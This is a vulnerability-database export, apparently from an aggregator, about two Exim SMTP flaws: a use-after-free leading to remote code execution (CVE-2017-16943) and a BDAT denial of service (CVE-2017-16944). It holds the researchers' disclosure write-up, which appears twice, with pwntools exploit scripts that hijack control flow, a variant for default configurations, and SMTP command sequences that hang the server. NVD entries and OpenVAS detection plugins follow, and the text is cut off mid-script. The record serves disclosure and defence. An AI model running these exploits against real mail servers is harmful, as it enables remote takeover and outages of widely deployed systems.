bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\r\n```\r\n if (chunking_data_left > 0)\r\n return lwr_receive_getc(chunking_data_left--);\r\n```\r\n\r\nThis is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.\r\n```\r\n\r\n# CVE-2017-16944 PoC by meh at DEVCORE\r\n\r\nEHLO localhost\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 100\r\n.\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 0 LAST\r\n```\r\n\r\nThis makes attackers able to launch a resource based DoS attack and then force the whole server down.\r\n\r\n### Fix\r\n\r\n* Turn off Chunking option in config file:\r\n```\r\nchunking_advertise_hosts =\r\n```\r\n* Update to 4.89.1 version\r\n* Patch of CVE-2017-16943 released [here](https://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde)\r\n* Patch of CVE-2017-16944 released [here](https://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542)\r\n\r\n### Timeline\r\n\r\n* 23 November, 2017 09:40 Report to Exim Bugzilla\r\n* 25 November, 2017 16:27 CVE-2017-16943 Patch released\r\n* 28 November, 2017 16:27 CVE-2017-16944 Patch released\r\n* 3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now\r\n\r\n### Remarks\r\n\r\nWhile we were trying to report these bugs to exim, we could not find any method for security report. Therefore, we followed the link on the official site for bug report and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly and therefore the PoC was leaked. Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.", "modified": "2017-11-28T00:00:00", "published": "2017-11-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96896", "id": "SSV:96896", "type": "seebug", "title": "Exim Use-After-Free(CVE-2017-16943)", "sourceData": "\n # pip install pwntools\r\nfrom pwn import *\r\n \r\nr = remote('127.0.0.1', 25)\r\n \r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<test@localhost>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<test@localhost>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96896", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-25T18:31:08", "bulletinFamily": "exploit", "description": "On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.\r\n\r\n### About Exim\r\n\r\nExim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a [mail server survey](http://www.securityspace.com/s_survey/data/man.201710/mxsurvey.html) by E-Soft Inc. shows over half of the mail servers identified are running exim.\r\n\r\n### Affected\r\n\r\n* Exim version 4.88 & 4.89 with chunking option enabled.\r\n* According to our survey, about 150k servers affected on 21st November, 2017 (data collected from scans.io).\r\n\r\n### Vulnerability Details\r\n\r\nThrough our research, the following vulnerabilies were discovered in Exim. Both vulnerabilies involve in BDAT command. BDAT is an extension in SMTP protocol, which is used to transfer large and binary data. A BDAT command is like `BDAT 1024` or `BDAT 1024 LAST`. With the SIZE and LAST declared, mail servers do not need to scan for the end dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.\r\n\r\n* Use-after-free in receive_msg leads to RCE (CVE-2017-16943)\r\n* Incorrect BDAT data handling leads to DoS (CVE-2017-16944)\r\n\r\n### Use-after-free in receive_msg leads to RCE\r\n\r\n#### Vulnerability Analysis\r\n\r\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starts with `store_` such as `store_get`, `store_release`, `store_reset`. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:\r\n\r\n\r\n\r\nInitially, exim allocates a big storeblock (default 0x2000) and then cut it into stores when `store_get` is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the `current_block` is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. Exim maintains three `store_pool`, that is, there are three chains like the illustration above and every global variables are actually arrays.\r\nThis vulnerability is in `receive_msg` where exim reads headers: \r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\r\n```\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n```\r\n\r\nIt seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend store, the function `store_extend` checks whether the old store is the latest store allocated in `current_block`. It returns False immediately if the check is failed.\r\n\r\n[`store.c: 276 store_extend`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\r\n```\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n```\r\n\r\nOnce `store_extend fails`, exim tries to get a new store and release the old one. After we look into `store_get` and store_release, we found that `store_get` returns a store, but `store_release` releases a block if the store is at the head of it. That is to say, if `next->text` points to the start the `current_block` and store_get cuts store inside it for newtext, then `store_release(next->text)` frees `next->text`, which is equal to current_block, and leaves newtext and `current_block` pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\r\n\r\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc`, `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to bdat_getc in order to check left chunking data size and to handle following command of BDAT. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, and stores data into `next->text`, extends if insufficient.\r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\r\n```\r\nfor (;;)\r\n {\r\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\r\n \r\n /* If we hit EOF on a SMTP connection, it's an error, since incoming\r\n SMTP must have a correct \".\" terminator. */\r\n\r\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\r\n {\r\n smtp_reply = handle_lost_connection(US\" (header)\");\r\n smtp_yield = FALSE;\r\n goto TIDYUP; /* Skip to end of function */\r\n }\r\n```\r\n\r\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect. \r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\r\n```\r\n case BDAT_CMD:\r\n {\r\n int n;\r\n\r\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\r\n {\r\n (void) synprot_error(L_smtp_protocol_error, 501, NULL,\r\n US\"missing size for BDAT command\");\r\n return ERR;\r\n }\r\n```\r\n\r\nIn exim, it usually calls `synprot_error` to raise error message, which also logs at the same time.\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\r\n```\r\nstatic int\r\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\r\n{\r\nint yield = -1;\r\n\r\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\r\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\r\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\r\n```\r\n\r\nThe log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as `'\\n'->'\\\\n'`. Therefore, it asks `store_get` for memory to store strings.\r\nThis store makes `if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` failed when next extension occurs and then triggers use-after-free.\r\n\r\n### Exploitation\r\n\r\nThe following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to `0xdeadbeef`. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\n\r\nr.interactive()\r\n```\r\n\r\n* Running out of `current_block`\r\nIn order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\r\n\r\n\r\n\r\n* Starts BDAT data transfer\r\nAfter that, we send BDAT command to start data transfer. At the beginning, next and `next->text` are allocated by `store_get`. \r\n\r\n\r\n\r\nThe function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses ANOTHER `store_pool`, so it allocates from heap without changing `current_block` which `next->text` also points to.\r\n\r\n[`receive.c: 1734 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\r\n```\r\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\r\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\r\n```\r\n\r\n* Call `store_getc` inside `bdat_getc`\r\nThen, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the `current_block` with `store_get` in `string_printing`. \r\n\r\n\r\n\r\n* Keep sending msg until extension and bug triggered\r\nIn this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to unsortbin inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \r\n\r\n\r\n\r\n* Keep sending msg for the next extension\r\nWhen the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena.\r\n\r\n* Overwrite global variables in libc\r\n* Finish sending message and trigger `free()`\r\nIn the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\r\nHowever, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of stdout and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \r\nWe consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. \r\n\r\n\r\n\r\n### Exploit for default configured exim\r\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsortbin.\r\n\r\nThe illustrations below describe the difference of heap layout:\r\n\r\n\r\n\r\n\r\n\r\nTo avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\r\n\r\nAfter running out of `current_block`:\r\n\r\n* Use DATA command to send lots of data\r\nSend huge data, make the chunk big and extend many times. After several extension, it calls `store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\r\n* End DATA transfer and start a new email\r\nRestart to send an email with BDAT command after the heap chunk is prepared.\r\n* Adjust `yield_length` again\r\nSend invalid command with an unprintable charater again to cut the `current_block`.\r\n\r\nFinally the heap layout is like:\r\n\r\n\r\n\r\nAnd now we can go back to the step 2 at the beginning and create the same situation. When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\r\n\r\nThe following is the PoC for default configured exim:\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('localhost', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1280+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('DATA')\r\nr.recvuntil('itself\\r\\n')\r\nr.sendline('b'*0x4000+':\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.recvline()\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x3480+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.send('\\n')\r\nr.interactive()\r\n```\r\n\r\nA demo of our exploit is as below.\r\n\r\n\r\n\r\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\r\n\r\n### Incorrect BDAT data handling leads to DoS\r\n\r\n#### Vulnerability Analysis\r\n\r\nWhen receiving data with BDAT command, SMTP server should not consider a single dot `'.'` in a line to be the end of message. However, we found exim does in receive_msg when parsing header. Like the following output:\r\n```\r\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\r\nEHLO test\r\n250-devco.re Hello root at test\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN CRAM-MD5\r\n250-CHUNKING\r\n250-STARTTLS\r\n250-PRDR\r\n250 HELP\r\nMAIL FROM:<meh@some.domain>\r\n250 OK\r\nRCPT TO:<meh@some.domain>\r\n250 Accepted\r\nBDAT 10\r\n.\r\n250- 10 byte chunk, total 0\r\n250 OK id=1eJFGW-000CB0-1R\r\n```\r\n\r\nAs we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same and an infinite loop occurs inside `bdat_getc`. Program crashes due to stack exhaustion.\r\n\r\n[`smtp_in.c: 546 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\r\n```\r\n if (chunking_data_left > 0)\r\n return lwr_receive_getc(chunking_data_left--);\r\n```\r\n\r\nThis is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.\r\n```\r\n\r\n# CVE-2017-16944 PoC by meh at DEVCORE\r\n\r\nEHLO localhost\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 100\r\n.\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 0 LAST\r\n```\r\n\r\nThis makes attackers able to launch a resource based DoS attack and then force the whole server down.\r\n\r\n### Fix\r\n\r\n* Turn off Chunking option in config file:\r\n```\r\nchunking_advertise_hosts =\r\n```\r\n* Update to 4.89.1 version\r\n* Patch of CVE-2017-16943 released [here](https://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde)\r\n* Patch of CVE-2017-16944 released [here](https://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542)\r\n\r\n### Timeline\r\n\r\n* 23 November, 2017 09:40 Report to Exim Bugzilla\r\n* 25 November, 2017 16:27 CVE-2017-16943 Patch released\r\n* 28 November, 2017 16:27 CVE-2017-16944 Patch released\r\n* 3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now\r\n\r\n### Remarks\r\n\r\nWhile we were trying to report these bugs to exim, we could not find any method for security report. Therefore, we followed the link on the official site for bug report and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly and therefore the PoC was leaked. Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.", "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96905", "id": "SSV:96905", "type": "seebug", "title": "Exim 4.89 - 'BDAT' Denial of Service(CVE-2017-16944)", "sourceData": "\n EHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 10\r\n.\r\nBDAT 0\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96905", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-10-04T12:19:00", "bulletinFamily": "NVD", "description": "The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-16944", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16944", "published": "2017-11-25T17:29:00", "title": "CVE-2017-16944", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-03T11:38:33", "bulletinFamily": "NVD", "description": "The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.", "modified": "2019-08-02T15:53:00", "id": "CVE-2017-16943", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16943", "published": "2017-11-25T17:29:00", "title": "CVE-2017-16943", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-14T00:00:00", "id": "OPENVAS:1361412562310873919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873919", "title": "Fedora Update for exim FEDORA-2017-0032baa7d7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0032baa7d7_exim_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-0032baa7d7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873919\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 11:43:32 +0100 (Thu, 14 Dec 2017)\");\n script_cve_id(\"CVE-2017-16944\", \"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-0032baa7d7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0032baa7d7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TAGF5675ALFYP2G5MHIQA3FAZM6IVXO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~7.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T19:02:19", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\nA use-after-free vulnerability was discovered in Exim", "modified": "2019-07-04T00:00:00", "published": "2017-11-30T00:00:00", "id": "OPENVAS:1361412562310704053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704053", "title": "Debian Security Advisory DSA 4053-1 (exim4 - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4053-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704053\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_name(\"Debian Security Advisory DSA 4053-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-30 00:00:00 +0100 (Thu, 30 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4053.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.89-2+deb9u2. Default installations disable advertising the\nESMTP CHUNKING extension and are not affected by these issues.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/exim4\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\nA use-after-free vulnerability was discovered in Exim's routines\nresponsible for parsing mail headers. A remote attacker can take\nadvantage of this flaw to cause Exim to crash, resulting in a denial\nof service, or potentially for remote code execution.\n\nCVE-2017-16944\nIt was discovered that Exim does not properly handle BDAT data\nheaders allowing a remote attacker to cause Exim to crash, resulting\nin a denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "Exim is prone to multiple remote code execution vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2017-11-27T00:00:00", "id": "OPENVAS:1361412562310140539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140539", "title": "Exim Multiple RCE Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_mult_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Exim Multiple RCE Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 